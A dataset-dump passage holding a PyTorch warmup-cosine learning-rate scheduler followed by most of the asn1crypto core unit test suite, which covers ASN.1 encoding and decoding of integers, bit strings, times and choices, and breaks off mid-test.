content stringlengths 5 1.05M |
|---|
import math
from torch.optim.lr_scheduler import _LRScheduler
from bisect import bisect_right
class WarmupCosineLR(_LRScheduler):
def __init__(self, optimizer, milestones, min_ratio=0., cycle_decay=1., warmup_iters=1000, warmup_factor=1./10, last_epoch=-1):
if not list(milestones) == sorted(milestones):
raise ValueError(
"Milestones should be a list of increasing integers. Got {}".format(milestones)
)
self.milestones = [warmup_iters]+milestones
self.min_ratio = min_ratio
self.cycle_decay = cycle_decay
self.warmup_iters = warmup_iters
self.warmup_factor = warmup_factor
super(WarmupCosineLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
if self.last_epoch < self.warmup_iters:
alpha = float(self.last_epoch) / self.warmup_iters
warmup_factor = self.warmup_factor * (1 - alpha) + alpha
return [base_lr * warmup_factor for base_lr in self.base_lrs]
else:
# which cyle is it
cycle = min(bisect_right(self.milestones, self.last_epoch), len(self.milestones)-1)
# calculate the fraction in the cycle
fraction = min((self.last_epoch - self.milestones[cycle-1]) / (self.milestones[cycle]-self.milestones[cycle-1]), 1.)
return [base_lr*self.min_ratio + (base_lr * self.cycle_decay**(cycle-1) - base_lr*self.min_ratio) *
(1 + math.cos(math.pi * fraction)) / 2
for base_lr in self.base_lrs] |
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import unittest
import os
from datetime import datetime, timedelta
from asn1crypto import core, util
from .unittest_data import data_decorator, data
from ._unittest_compat import patch
patch()
tests_root = os.path.dirname(__file__)
fixtures_dir = os.path.join(tests_root, 'fixtures')
class NamedBits(core.BitString):
_map = {
0: 'zero',
1: 'one',
2: 'two',
3: 'three',
4: 'four',
6: 'six',
7: 'seven',
}
class SequenceOfInts(core.SequenceOf):
_child_spec = core.Integer
class SequenceAny(core.SequenceOf):
_child_spec = core.Any
class Seq(core.Sequence):
_fields = [
('id', core.ObjectIdentifier),
('value', core.Any),
]
_oid_pair = ('id', 'value')
_oid_specs = {
'1.2.3': core.Integer,
'2.3.4': core.OctetString,
}
class CopySeq(core.Sequence):
_fields = [
('name', core.UTF8String),
('pair', Seq),
]
class NestSeqAny(core.Sequence):
_fields = [
('id', core.ObjectIdentifier),
('value', core.Any),
]
_oid_pair = ('id', 'value')
_oid_specs = {
'3.4.5': Seq,
}
class NestSeqExplicit(core.Sequence):
_fields = [
('id', core.ObjectIdentifier),
('value', NamedBits),
]
_oid_pair = ('id', 'value')
_oid_specs = {
'3.4.5': Seq,
}
class Enum(core.Enumerated):
_map = {
0: 'a',
1: 'b',
}
class ExplicitFieldDefault(core.Sequence):
_fields = [
('bits', NamedBits),
('seq', Seq, {'explicit': 2, 'default': {'id': '1.2.3', 'value': 10}}),
]
class NumChoice(core.Choice):
_alternatives = [
('one', core.Integer, {'explicit': 0}),
('two', core.Integer, {'implicit': 1}),
('three', core.Integer, {'explicit': 2}),
]
class NumChoiceOldApi(core.Choice):
_alternatives = [
('one', core.Integer, {'tag_type': 'explicit', 'tag': 0}),
('two', core.Integer, {'tag_type': 'implicit', 'tag': 1}),
('three', core.Integer, {'tag_type': 'explicit', 'tag': 2}),
]
class SeqChoice(core.Choice):
_alternatives = [
('one', CopySeq, {'explicit': 0}),
('two', CopySeq, {'implicit': 1}),
]
class SeqChoiceOldApi(core.Choice):
_alternatives = [
('one', CopySeq, {'tag_type': 'explicit', 'tag': 0}),
('two', CopySeq, {'tag_type': 'implicit', 'tag': 1}),
]
class ChoiceChoice(core.Choice):
_alternatives = [
('num', NumChoice, {'explicit': 0}),
('seq', SeqChoice, {'explicit': 1}),
]
class CCSeq(core.Sequence):
_fields = [
('cc', ChoiceChoice)
]
class ExplicitField(core.Sequence):
_fields = [
('field', NumChoice, {'tag_type': 'explicit', 'tag': 0}),
]
class ExplicitFieldOldApi(core.Sequence):
_fields = [
('field', NumChoiceOldApi, {'explicit': 0}),
]
class SetTest(core.Set):
_fields = [
('two', core.Integer, {'tag_type': 'implicit', 'tag': 2}),
('one', core.Integer, {'tag_type': 'implicit', 'tag': 1}),
]
class SetTestOldApi(core.Set):
_fields = [
('two', core.Integer, {'implicit': 2}),
('one', core.Integer, {'implicit': 1}),
]
class SetOfTest(core.SetOf):
_child_spec = core.Integer
class ConcatTest(core.Concat):
_child_specs = [Seq, core.Integer]
class IntegerConcats(core.Concat):
_child_specs = [core.Integer, core.Integer]
class MyOids(core.ObjectIdentifier):
_map = {
'1.2.3': 'abc',
'4.5.6': 'def',
}
class ApplicationTaggedInteger(core.Integer):
# This class attribute may be a 2-element tuple of integers,
# or a tuple of 2-element tuple of integers. The first form
# will be converted to the second form the first time an
# object of this type is constructed.
explicit = ((1, 10), )
class ApplicationTaggedInner(core.Sequence):
"""
TESTCASE DEFINITIONS EXPLICIT TAGS ::=
BEGIN
INNERSEQ ::= SEQUENCE {
innernumber [21] INTEGER
}
INNER ::= [APPLICATION 20] INNERSEQ
"""
explicit = (1, 20)
_fields = [
('innernumber', core.Integer, {'explicit': 21}),
]
class ApplicationTaggedOuter(core.Sequence):
"""
OUTERSEQ ::= SEQUENCE {
outernumber [11] INTEGER,
inner [12] INNER
}
OUTER ::= [APPLICATION 10] OUTERSEQ
END
"""
explicit = (1, 10)
_fields = [
('outernumber', core.Integer, {'explicit': 11}),
('inner', ApplicationTaggedInner, {'explicit': 12}),
]
class SpcPeImageFlags(core.BitString):
_map = {
0: "includeResources",
1: "includeDebugInfo",
2: "includeImportAddressTable",
}
class SpcSerializedObject(core.Sequence):
_fields = [
("classId", core.OctetString),
("serializedData", core.OctetString),
]
class SpcString(core.Choice):
_alternatives = [
("unicode", core.BMPString, {"implicit": 0}),
("ascii", core.IA5String, {"implicit": 1}),
]
class SpcLink(core.Choice):
_alternatives = [
("url", core.IA5String, {"implicit": 0}),
("moniker", SpcSerializedObject, {"implicit": 1}),
("file", SpcString, {"explicit": 2})
]
class SpcPeImageData(core.Sequence):
_fields = [
("flags", SpcPeImageFlags, {"default": "includeResources"}),
("file", SpcLink, {"explicit": 0})
]
class UTF8Sequence(core.Sequence):
_fields = [
("string", core.UTF8String)
]
class NestedUTF8Sequence(core.Sequence):
_fields = [
("seq", UTF8Sequence)
]
@data_decorator
class CoreTests(unittest.TestCase):
def test_large_tag_encode(self):
# https://misc.daniel-marschall.de/asn.1/oid_facts.html
v = core.Primitive(tag=31, contents=b'')
self.assertEqual(b'\x1f\x1f\x00', v.dump())
v = core.Primitive(tag=36, contents=b'')
self.assertEqual(b'\x1f\x24\x00', v.dump())
# One extra byte
v = core.Primitive(
class_="application",
method="constructed",
tag=73,
contents=b''
)
self.assertEqual(b'\x7f\x49\x00', v.dump())
# Two extra bytes
v = core.Primitive(
class_="application",
method="constructed",
tag=201,
contents=b''
)
self.assertEqual(b'\x7f\x81\x49\x00', v.dump())
# Three extra bytes
v = core.Primitive(
class_="application",
method="constructed",
tag=16384,
contents=b''
)
self.assertEqual(b'\x7f\x81\x80\x00\x00', v.dump())
def test_manual_construction(self):
v = core.Asn1Value(
class_="application",
method="constructed",
tag=1,
contents=b''
)
self.assertEqual(b'\x61\x00', v.dump())
def test_sequence_spec(self):
seq = Seq()
seq['id'] = '1.2.3'
self.assertEqual(core.Integer, seq.spec('value'))
seq['id'] = '2.3.4'
self.assertEqual(core.OctetString, seq.spec('value'))
def test_sequence_of_spec(self):
seq = SequenceAny()
self.assertEqual(core.Any, seq.spec())
@staticmethod
def compare_primitive_info():
return (
(core.ObjectIdentifier('1.2.3'), core.ObjectIdentifier('1.2.3'), True),
(core.Integer(1), Enum(1), False),
(core.Integer(1), core.Integer(1, implicit=5), True),
(core.Integer(1), core.Integer(1, explicit=5), True),
(core.Integer(1), core.Integer(2), False),
(core.OctetString(b''), core.OctetString(b''), True),
(core.OctetString(b''), core.OctetString(b'1'), False),
(core.OctetString(b''), core.OctetBitString(b''), False),
(core.ParsableOctetString(b'12'), core.OctetString(b'12'), True),
(core.ParsableOctetBitString(b'12'), core.OctetBitString(b'12'), True),
(core.UTF8String('12'), core.UTF8String('12'), True),
(core.UTF8String('12'), core.UTF8String('1'), False),
(core.UTF8String('12'), core.IA5String('12'), False),
)
@data('compare_primitive_info')
def compare_primitive(self, one, two, equal):
if equal:
self.assertEqual(one, two)
else:
self.assertNotEqual(one, two)
@staticmethod
def integer_info():
return (
(0, b'\x02\x01\x00'),
(255, b'\x02\x02\x00\xFF'),
(128, b'\x02\x02\x00\x80'),
(127, b'\x02\x01\x7F'),
(-127, b'\x02\x01\x81'),
(-127, b'\x02\x01\x81'),
(32768, b'\x02\x03\x00\x80\x00'),
(-32768, b'\x02\x02\x80\x00'),
(-32769, b'\x02\x03\xFF\x7F\xFF'),
)
@data('integer_info')
def integer(self, native, der_bytes):
i = core.Integer(native)
self.assertEqual(der_bytes, i.dump())
self.assertEqual(native, core.Integer.load(der_bytes).native)
@staticmethod
def utctime_info():
return (
(datetime(2030, 12, 31, 8, 30, 0, tzinfo=util.timezone.utc), b'\x17\x0D301231083000Z'),
(datetime(2049, 12, 31, 8, 30, 0, tzinfo=util.timezone.utc), b'\x17\x0D491231083000Z'),
(datetime(1950, 12, 31, 8, 30, 0, tzinfo=util.timezone.utc), b'\x17\x0D501231083000Z'),
(datetime(2018, 10, 20, 7, 35, 4, tzinfo=util.timezone(timedelta(hours=7, minutes=40))),
b'\x17\x0D181019235504Z'),
)
@data('utctime_info')
def utctime(self, native, der_bytes):
u = core.UTCTime(native)
self.assertEqual(der_bytes, u.dump())
self.assertEqual(native, core.UTCTime.load(der_bytes).native)
def test_utctime_errors(self):
with self.assertRaises(ValueError):
# is not aware
core.UTCTime(datetime.fromtimestamp(1234567890))
with self.assertRaises(ValueError):
# Is pre 1950
core.UTCTime(datetime(1910, 6, 22, 11, 33, 44, tzinfo=util.timezone.utc))
with self.assertRaises(ValueError):
# Is past 2050
core.UTCTime(datetime(2106, 2, 7, 6, 28, 16, tzinfo=util.timezone.utc))
def test_utctime_copy(self):
a = core.UTCTime(datetime(2019, 11, 11, 17, 45, 18, tzinfo=util.timezone.utc))
# Ensure _native is set because we want to test copy on the nested timezone object.
a.native
b = a.copy()
self.assertEqual(a.native, b.native)
self.assertEqual(a.contents, b.contents)
self.assertEqual(a.dump(), b.dump())
@staticmethod
def generalized_time_info():
def tz(hours, minutes=0):
return util.create_timezone(timedelta(hours=hours, minutes=minutes))
return (
(b'\x18\x1520180405062426.0+0200', datetime(2018, 4, 5, 6, 24, 26, 0, tz(2)), b'\x18\x0f20180405042426Z'),
(b'\x18\x0f2018062419-1355', datetime(2018, 6, 24, 19, 0, 0, 0, tz(-13, -55)), b'\x18\x0f20180625085500Z'),
(b'\x18\x0d2018062419-13', datetime(2018, 6, 24, 19, 0, 0, 0, tz(-13)), b'\x18\x0f20180625080000Z'),
(b'\x18\x0b2018062419Z', datetime(2018, 6, 24, 19, 0, 0, 0, tz(0)), b'\x18\x0f20180624190000Z'),
(b'\x18\x122018062419.15+0345', datetime(2018, 6, 24, 19, 9, 0, 0, tz(3, 45)), b'\x18\x0f20180624152400Z'),
(
b'\x18\x13201806241957,433+02',
datetime(2018, 6, 24, 19, 57, 25, 980000, tz(2)),
b'\x18\x1220180624175725.98Z',
),
(
b'\x18\x1620180624195724.215999Z',
datetime(2018, 6, 24, 19, 57, 24, 215999, tz(0)),
b'\x18\x1620180624195724.215999Z',
),
(
b'\x18\x150000022910.31337-0815',
util.extended_datetime(0, 2, 29, 10, 18, 48, 132000, tz(-8, -15)),
b'\x18\x1300000229183348.132Z',
),
(b'\x18\x1520180624195724.215999', datetime(2018, 6, 24, 19, 57, 24, 215999), None),
(b'\x18\x0a2018062419', datetime(2018, 6, 24, 19, 0, 0, 0), None),
)
@data('generalized_time_info')
def generalized_time(self, ber_bytes, native, der_bytes):
decoded = core.GeneralizedTime.load(ber_bytes)
self.assertEqual(decoded.native, native)
self.assertEqual(decoded.native.tzinfo, native.tzinfo)
if der_bytes is not None:
encoded = core.GeneralizedTime(native).dump()
self.assertEqual(encoded, der_bytes)
decoded2 = core.GeneralizedTime.load(encoded)
self.assertEqual(decoded2.native, native)
else:
with self.assertRaises(ValueError):
encoded = core.GeneralizedTime(native).dump()
@staticmethod
def type_info():
return (
('universal/object_identifier.der', core.ObjectIdentifier, '1.2.840.113549.1.1.1'),
)
@data('type_info')
def parse_universal_type(self, input_filename, type_class, native):
with open(os.path.join(fixtures_dir, input_filename), 'rb') as f:
der = f.read()
parsed = type_class.load(der)
self.assertEqual(native, parsed.native)
self.assertEqual(der, parsed.dump(force=True))
def test_int_to_bit_tuple(self):
self.assertEqual((), core._int_to_bit_tuple(0, 0))
self.assertEqual((0,), core._int_to_bit_tuple(0, 1))
self.assertEqual((1,), core._int_to_bit_tuple(1, 1))
self.assertEqual((0, 0), core._int_to_bit_tuple(0, 2))
self.assertEqual((0, 1), core._int_to_bit_tuple(1, 2))
self.assertEqual((0, 0, 1), core._int_to_bit_tuple(1, 3))
self.assertEqual((0, 1, 0), core._int_to_bit_tuple(2, 3))
self.assertEqual((1, 0, 1), core._int_to_bit_tuple(5, 3))
with self.assertRaises(ValueError):
core._int_to_bit_tuple(9, 3)
with self.assertRaises(ValueError):
core._int_to_bit_tuple(-9, 5)
@staticmethod
def bit_string_info():
return (
((0, 1, 1), b'\x03\x02\x05\x60'),
((0, 1, 1, 0, 0, 0, 0, 0), b'\x03\x02\x00\x60'),
((0, 0, 0, 0, 0, 0, 0, 0), b'\x03\x02\x00\x00'),
((0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1), b'\x03\x03\x00\x00\x01'),
)
@data('bit_string_info')
def bit_string(self, native, der_bytes):
bs = core.BitString(native)
self.assertEqual(der_bytes, bs.dump())
self.assertEqual(native, core.BitString.load(der_bytes).native)
def test_bit_string_load_dump(self):
bs = core.BitString.load(b'\x03\x01\x00')
self.assertEqual(tuple(), bs.native)
self.assertEqual(b'\x03\x01\x00', bs.dump(True))
@staticmethod
def bit_string_error_values():
return (
# unused bits in empty bit string
(b'\x03\x01\x05',),
# too many unused bits
(b'\x03\x03\x0e\x0c\x00',),
# chunk with unused bits is not last chunk
(b'\x23\x80\x03\x02\x01\xfe\x03\x02\x00\x55\x00\x00',),
)
@data('bit_string_error_values')
def bit_string_errors(self, enc_bytes):
with self.assertRaises(ValueError):
core.BitString.load(enc_bytes).native
def test_cast(self):
a = core.OctetBitString(b'\x00\x01\x02\x03')
self.assertEqual(b'\x00\x01\x02\x03', a.native)
b = a.cast(core.BitString)
self.assertIsInstance(b, core.BitString)
self.assertEqual(
(
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0, 0, 0, 1, 0,
0, 0, 0, 0, 0, 0, 1, 1
),
b.native
)
c = a.cast(core.IntegerBitString)
self.assertIsInstance(c, core.IntegerBitString)
self.assertEqual(66051, c.native)
def test_load(self):
i = core.load(b'\x02\x01\x00')
self.assertIsInstance(i, core.Integer)
self.assertEqual(0, i.native)
def test_load_wrong_type(self):
with self.assertRaises(TypeError):
core.load('\x02\x01\x00')
@staticmethod
def truncated_der_byte_strings():
return (
(b'',),
(b'\x30',),
(b'\x30\x03\x02\x00\x02',),
)
@data('truncated_der_byte_strings')
def truncated(self, der_bytes):
with self.assertRaises(ValueError):
core.load(der_bytes).native
def test_strict(self):
with self.assertRaises(ValueError):
core.load(b'\x02\x01\x00\x00', strict=True)
def test_strict_on_class(self):
with self.assertRaises(ValueError):
core.Integer.load(b'\x02\x01\x00\x00', strict=True)
def test_strict_concat(self):
with self.assertRaises(ValueError):
IntegerConcats.load(b'\x02\x01\x00\x02\x01\x00\x00', strict=True)
def test_strict_choice(self):
with self.assertRaises(ValueError):
NumChoice.load(b'\xA0\x03\x02\x01\x00\x00', strict=True)
with self.assertRaises(ValueError):
NumChoiceOldApi.load(b'\xA0\x03\x02\x01\x00\x00', strict=True)
def test_choice_parse_return(self):
nc = NumChoice.load(b'\xA0\x03\x02\x01\x00\x00')
nc._parsed = None
self.assertEqual(0, nc.parse().native)
def test_sequece_choice_choice(self):
CCSeq({
'cc': ChoiceChoice(
'num',
NumChoice('one', core.Integer(0))
)
})
def test_bit_string_item_access(self):
named = core.BitString()
named[0] = True
self.assertEqual(False, named[2])
self.assertEqual(False, named[1])
self.assertEqual(True, named[0])
@staticmethod
def mapped_bit_string_info():
return (
(
(0, 1, 1),
b'\x03\x02\x05\x60',
set(['one', 'two'])
),
(
(0,),
b'\x03\x01\x00',
set()
),
(
set(['one', 'two']),
b'\x03\x02\x05\x60',
set(['one', 'two'])
)
)
@data('mapped_bit_string_info')
def mapped_bit_string(self, input_native, der_bytes, native):
named = NamedBits(input_native)
self.assertEqual(der_bytes, named.dump())
self.assertEqual(native, NamedBits.load(der_bytes).native)
def test_mapped_bit_string_item_access(self):
named = NamedBits()
named['one'] = True
self.assertEqual(False, named['two'])
self.assertEqual(True, named['one'])
self.assertEqual(True, 'one' in named.native)
def test_mapped_bit_string_unset_bit(self):
named = NamedBits(set(['one', 'two']))
named['one'] = False
self.assertEqual(True, named['two'])
self.assertEqual(set(['two']), named.native)
def test_mapped_bit_string_sparse(self):
named = NamedBits((0, 0, 0, 0, 0, 1))
self.assertEqual(False, named['two'])
self.assertEqual(True, named[5])
self.assertEqual(True, 5 in named.native)
def test_mapped_bit_string_numeric(self):
named = NamedBits()
named[1] = True
self.assertEqual(True, named['one'])
self.assertEqual(set(['one']), named.native)
def test_get_sequence_value(self):
seq = SequenceOfInts([1, 2])
self.assertEqual(2, seq[1].native)
def test_replace_sequence_value(self):
seq = SequenceOfInts([1, 2])
self.assertEqual([1, 2], seq.native)
seq[0] = 5
self.assertEqual([5, 2], seq.native)
def test_add_to_end_sequence_value(self):
seq = SequenceOfInts([1, 2])
self.assertEqual([1, 2], seq.native)
seq[2] = 5
self.assertEqual([1, 2, 5], seq.native)
seq.append(6)
self.assertEqual([1, 2, 5, 6], seq.native)
def test_delete_sequence_value(self):
seq = SequenceOfInts([1, 2])
self.assertEqual([1, 2], seq.native)
del seq[0]
self.assertEqual([2], seq.native)
def test_sequence_any_asn1value(self):
seq = SequenceAny()
seq.append(core.Integer(5))
self.assertEqual([5], seq.native)
def test_sequence_any_native_value(self):
seq = SequenceAny()
with self.assertRaises(ValueError):
seq.append(5)
def test_copy(self):
a = core.Integer(200)
b = a.copy()
self.assertNotEqual(id(a), id(b))
self.assertEqual(a.contents, b.contents)
self.assertEqual(a.dump(), b.dump())
def test_copy_mutable(self):
a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
# Cache the native representation so it is copied during the copy operation
a.native
b = a.copy()
self.assertNotEqual(id(a), id(b))
self.assertNotEqual(id(a['pair']), id(b['pair']))
self.assertEqual(a.contents, b.contents)
self.assertEqual(a.dump(), b.dump())
self.assertEqual(a['pair']['value'].native, b['pair']['value'].native)
a['pair']['value'] = 6
self.assertNotEqual(a['pair']['value'].native, b['pair']['value'].native)
a.native['pair']['value'] = 6
self.assertNotEqual(a.native['pair']['value'], b.native['pair']['value'])
self.assertNotEqual(a.contents, b.contents)
self.assertNotEqual(a.dump(), b.dump())
def test_explicit_tag_header(self):
val = NumChoice.load(b'\xa0\x03\x02\x01\x00')
self.assertEqual(b'\xa0\x03\x02\x01', val.chosen._header)
self.assertEqual(b'\x00', val.chosen.contents)
val2 = NumChoiceOldApi.load(b'\xa0\x03\x02\x01\x00')
self.assertEqual(b'\xa0\x03\x02\x01', val2.chosen._header)
self.assertEqual(b'\x00', val2.chosen.contents)
def test_explicit_field_default(self):
val = ExplicitFieldDefault.load(b'\x30\x0f\x03\x02\x06@\xa2\x090\x07\x06\x02*\x03\x02\x01\x01')
self.assertEqual(set(['one']), val['bits'].native)
self.assertEqual(
util.OrderedDict([
('id', '1.2.3'),
('value', 1)
]),
val['seq'].native
)
def test_explicit_header_field_choice(self):
der = b'\x30\x07\xa0\x05\xa0\x03\x02\x01\x00'
val = ExplicitField.load(der)
self.assertEqual(0, val['field'].chosen.native)
self.assertEqual(der, val.dump(force=True))
val2 = ExplicitFieldOldApi.load(der)
self.assertEqual(0, val2['field'].chosen.native)
self.assertEqual(der, val2.dump(force=True))
def test_retag(self):
a = core.Integer(200)
b = a.retag('explicit', 0)
self.assertNotEqual(id(a), id(b))
self.assertEqual(a.contents, b.contents)
self.assertNotEqual(a.dump(), b.dump())
def test_untag(self):
a = core.Integer(200, explicit=0)
b = a.untag()
self.assertNotEqual(id(a), id(b))
self.assertEqual(a.contents, b.contents)
self.assertNotEqual(a.dump(), b.dump())
def test_choice_dict_name(self):
a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
choice = SeqChoice({'one': a})
self.assertEqual('one', choice.name)
with self.assertRaises(ValueError):
SeqChoice({})
with self.assertRaises(ValueError):
SeqChoice({'one': a, 'two': a})
choice2 = SeqChoiceOldApi({'one': a})
self.assertEqual('one', choice2.name)
with self.assertRaises(ValueError):
SeqChoiceOldApi({})
with self.assertRaises(ValueError):
SeqChoiceOldApi({'one': a, 'two': a})
def test_choice_tuple_name(self):
a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
choice = SeqChoice(('one', a))
self.assertEqual('one', choice.name)
with self.assertRaises(ValueError):
SeqChoice(('one',))
with self.assertRaises(ValueError):
SeqChoice(('one', a, None))
choice2 = SeqChoiceOldApi(('one', a))
self.assertEqual('one', choice2.name)
with self.assertRaises(ValueError):
SeqChoiceOldApi(('one',))
with self.assertRaises(ValueError):
SeqChoiceOldApi(('one', a, None))
def test_load_invalid_choice(self):
with self.assertRaises(ValueError):
NumChoice.load(b'\x02\x01\x00')
with self.assertRaises(ValueError):
NumChoiceOldApi.load(b'\x02\x01\x00')
def test_fix_tagging_choice(self):
correct = core.Integer(200, explicit=2)
choice = NumChoice(
name='three',
value=core.Integer(200, explicit=1)
)
self.assertEqual(correct.dump(), choice.dump())
self.assertEqual(correct.explicit, choice.chosen.explicit)
choice2 = NumChoiceOldApi(
name='three',
value=core.Integer(200, explicit=1)
)
self.assertEqual(correct.dump(), choice2.dump())
self.assertEqual(correct.explicit, choice2.chosen.explicit)
def test_copy_choice_mutate(self):
a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
choice = SeqChoice(
name='one',
value=a
)
choice.dump()
choice_copy = choice.copy()
choice.chosen['name'] = 'bar'
self.assertNotEqual(choice.chosen['name'], choice_copy.chosen['name'])
choice2 = SeqChoiceOldApi(
name='one',
value=a
)
choice2.dump()
choice2_copy = choice2.copy()
choice2.chosen['name'] = 'bar'
self.assertNotEqual(choice2.chosen['name'], choice2_copy.chosen['name'])
def test_dump_ber_indefinite(self):
# A simple primitive type that is indefinite-length-encoded will be
# automatically re-encoded to DER encoding
data = b'\x2C\x80\x0C\x03foo\x00\x00'
v = core.UTF8String.load(data)
self.assertEqual(True, v._indefinite)
self.assertEqual('foo', v.native)
self.assertEqual(b'\x0C\x03foo', v.dump())
# In this case the indefinite length items are nested, and the
# top-level item is fixed-length, so it won't get automatically
# re-encoded
data = b'\x30\x0d\x30\x80\x2C\x80\x0C\x03foo\x00\x00\x00\x00'
v = NestedUTF8Sequence.load(data)
self.assertEqual(data, v.dump())
# Here both the top-level and the nested encoding will get fixed since
# the top-level being indefinitely triggers a full re-encoding
data = b'\x30\x80\x30\x09\x2C\x80\x0C\x03foo\x00\x00\x00\x00'
v = NestedUTF8Sequence.load(data)
self.assertEqual(b'\x30\x07\x30\x05\x0C\x03foo', v.dump())
def test_copy_indefinite(self):
v = core.BitString.load(b'\x23\x80\x03\x02\x00\x04\x00\x00')
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(3, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual((0, 0, 0, 0, 0, 1, 0, 0), v2.native)
self.assertEqual(b'\x03\x02\x00\x04', v2.dump())
v = core.OctetBitString.load(b'\x23\x80\x03\x02\x00\x04\x00\x00')
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(3, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual(b'\x04', v2.native)
self.assertEqual(b'\x03\x02\x00\x04', v2.dump())
v = core.ParsableOctetBitString.load(b'\x23\x80\x03\x04\x00\x02\x01\x04\x00\x00')
self.assertEqual(4, v.parsed.native)
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(3, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual(4, v2.parsed.native)
self.assertEqual(b'\x03\x04\x00\x02\x01\x04', v2.dump())
v = core.IntegerBitString.load(b'\x23\x80\x03\x02\x00\x04\x00\x00')
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(3, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual(4, v2.native)
self.assertEqual(b'\x03\x02\x00\x04', v2.dump())
v = core.OctetString.load(b'\x24\x80\x04\x03foo\x00\x00')
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(4, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual(b'foo', v2.native)
self.assertEqual(b'\x04\x03foo', v2.dump())
v = core.IntegerOctetString.load(b'\x24\x80\x04\x01\x04\x00\x00')
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(4, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual(4, v2.native)
self.assertEqual(b'\x04\x01\x04', v2.dump())
v = core.ParsableOctetString.load(b'\x24\x80\x04\x03\x02\x01\x04\x00\x00')
self.assertEqual(4, v.parsed.native)
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(4, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual(4, v2.parsed.native)
self.assertEqual(b'\x02\x01\x04', v2.__bytes__())
self.assertEqual(b'\x04\x03\x02\x01\x04', v2.dump())
v = core.UTF8String.load(b'\x2C\x80\x0C\x03foo\x00\x00')
self.assertEqual(True, v._indefinite)
v2 = v.copy()
self.assertEqual(0, v2.method)
self.assertEqual(12, v2.tag)
self.assertEqual(False, v2._indefinite)
self.assertEqual('foo', v2.native)
self.assertEqual(b'\x0C\x03foo', v2.dump())
def test_concat(self):
child1 = Seq({
'id': '1.2.3',
'value': 1
})
child2 = core.Integer(0)
parent = ConcatTest([
child1,
child2
])
self.assertEqual(child1, parent[0])
self.assertEqual(child2, parent[1])
self.assertEqual(child1.dump() + child2.dump(), parent.dump())
def test_oid_map_unmap(self):
self.assertEqual('abc', MyOids.map('1.2.3'))
self.assertEqual('def', MyOids.map('4.5.6'))
self.assertEqual('7.8.9', MyOids.map('7.8.9'))
self.assertEqual('1.2.3', MyOids.unmap('abc'))
self.assertEqual('4.5.6', MyOids.unmap('def'))
self.assertEqual('7.8.9', MyOids.unmap('7.8.9'))
with self.assertRaises(ValueError):
MyOids.unmap('no_such_mapping')
def test_oid_dotted_native(self):
self.assertEqual('abc', MyOids('1.2.3').native)
self.assertEqual('1.2.3', MyOids('1.2.3').dotted)
self.assertEqual('abc', MyOids('abc').native)
self.assertEqual('1.2.3', MyOids('abc').dotted)
def test_dump_set(self):
st = SetTest({'two': 2, 'one': 1})
self.assertEqual(b'1\x06\x81\x01\x01\x82\x01\x02', st.dump())
def test_dump_set_of(self):
st = SetOfTest([3, 2, 1])
self.assertEqual(b'1\x09\x02\x01\x01\x02\x01\x02\x02\x01\x03', st.dump())
def test_indefinite_length_octet_string(self):
data = b'$\x80\x04\x02\x01\x01\x04\x01\x01\x00\x00'
a = core.OctetString.load(data)
self.assertEqual(b'\x01\x01\x01', a.native)
self.assertEqual(b'\x01\x01\x01', a.__bytes__())
self.assertEqual(1, a.method)
# Test copying moves internal state
self.assertEqual(a._bytes, a.copy()._bytes)
def test_indefinite_length_octet_string_2(self):
data = b'$\x80\x04\r\x8d\xff\xf0\x98\x076\xaf\x93nB:\xcf\xcc\x04\x15' \
b'\x92w\xf7\xf0\xe4y\xff\xc7\xdc3\xb2\xd0={\x1a\x18mDr\xaaI\x00\x00'
a = core.OctetString.load(data)
self.assertEqual(
b'\x8d\xff\xf0\x98\x076\xaf\x93nB:\xcf\xcc\x92w\xf7\xf0\xe4y\xff\xc7\xdc3\xb2\xd0={\x1a\x18mDr\xaaI',
a.native
)
def test_nested_indefinite_length_octet_string(self):
data = b'\x24\x80\x24\x80\x24\x80\x04\x00\x00\x00\x00\x00\x00\x00'
a = core.load(data)
self.assertEqual(b'', a.native)
self.assertEqual(b'', a.__bytes__())
self.assertEqual(1, a.method)
self.assertEqual(b'\x04\x00', a.dump(force=True))
# Test copying moves internal state
self.assertEqual(a._bytes, a.copy()._bytes)
def test_indefinite_length_integer_octet_string(self):
data = b'$\x80\x04\x02\x01\x01\x04\x01\x01\x00\x00'
a = core.IntegerOctetString.load(data)
self.assertEqual(65793, a.native)
self.assertEqual(1, a.method)
self.assertEqual(b'\x01\x01\x01', a.cast(core.OctetString).native)
def test_indefinite_length_parsable_octet_string(self):
data = b'$\x80\x04\x02\x04\x01\x04\x01\x01\x00\x00'
a = core.ParsableOctetString.load(data)
self.assertEqual(b'\x04\x01\x01', a.parsed.dump())
self.assertEqual(b'\x04\x01\x01', a.__bytes__())
self.assertEqual(1, a.method)
self.assertEqual(b'\x01', a.parsed.native)
self.assertEqual(b'\x01', a.native)
self.assertEqual(b'\x04\x01\x01', a.cast(core.OctetString).native)
# Test copying moves internal state
self.assertEqual(a._bytes, a.copy()._bytes)
self.assertEqual(a._parsed, a.copy()._parsed)
def test_indefinite_length_utf8string(self):
